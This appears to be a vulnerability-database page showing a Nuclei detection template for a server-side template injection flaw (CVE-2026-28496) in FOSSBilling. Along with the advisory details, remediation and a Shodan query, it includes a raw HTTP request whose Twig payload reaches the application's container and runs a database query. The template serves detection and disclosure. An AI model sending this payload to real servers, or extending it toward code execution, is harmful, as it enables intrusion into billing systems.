Lucene search
K

FOSSBilling - Server-Side Template Injection

🗓️ 01 Jul 2026 11:28:40Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 7 Views

FOSSBilling SSTI in Twig rendering lets admins inject code and access full environment via templates and string_render.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2026-28496
29 Jun 202614:39
githubexploit
ATTACKERKB
CVE-2026-42347
26 May 202614:34
attackerkb
ATTACKERKB
CVE-2026-28496
23 Jun 202614:20
attackerkb
Circl
CVE-2026-28496
23 Jun 202607:40
circl
CVE
CVE-2026-28496
23 Jun 202614:20
cve
Cvelist
CVE-2026-28496 FOSSBilling: Server-side template injection in Twig template rendering enables information disclosure and RCE
23 Jun 202614:20
cvelist
EUVD
EUVD-2026-38455
23 Jun 202614:20
euvd
NVD
CVE-2026-28496
23 Jun 202615:16
nvd
Positive Technologies
PT-2026-44501
26 May 202600:00
ptsecurity
VulnCheck KEV
VulnCheck KEV: CVE-2026-28496
25 Jun 202600:00
vulncheck_kev
Rows per page
id: CVE-2026-28496

info:
  name: FOSSBilling - Server-Side Template Injection
  author: DhiyaneshDK
  severity: critical
  description: |
    A Server-Side Template Injection (SSTI) vulnerability exists in FOSSBilling's template rendering system. Administrators with access to features that render Twig templates (email templates, mass mail campaigns, custom payment adapters, and the string_render API endpoint) can inject arbitrary Twig expressions, leading to information disclosure and remote code execution. The vulnerability exists because Twig templates are rendered without a sandbox, allowing access to the full Twig environment, API context, and the application's dependency injection container.
  impact: |
    Administrators can execute arbitrary code and disclose sensitive information, potentially compromising the entire system.
  remediation: |
    Upgrade to version 0.8.0 or later.
  reference:
    - https://www.vulncheck.com/blog/fossbilling-auth-bypass-ssti-rce
    - https://github.com/FOSSBilling/FOSSBilling/security/advisories/GHSA-57mv-jm88-66jc
    - https://x.com/pyn3rd/status/2069260345571696951
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"FOSSBilling"
  tags: cve,cve2026,ssti,rce,sqli,fossbilling,vkev

http:
  - raw:
      - |
        POST /api/system/system/string_render HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"_tpl":"{{ guest.getDi().db.getCell(\"SELECT @@version\") }}","_try":false}

    skip-variables-check: true

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "[0-9]+\\.[0-9]+\\.[0-9]+"
          - '{"result":"'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        regex:
          - "[0-9]+\\.[0-9]+\\.[0-9]+[\\-a-zA-Z0-9]*"
# digest: 4a0a0047304502207311a0e1ebdd716f6a81c0f4d492b4ea6dd7dd111bef5cbd4dca09c2568f8b9c02210092e85389def43f9a51da3a4d5266ccedd6ab7240bb66655f21c43d1f82c3d4ca:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Jun 2026 07:40Current
6.2Medium risk
Vulners AI Score6.2
CVSS 49.4
EPSS0.01892
SSVC
7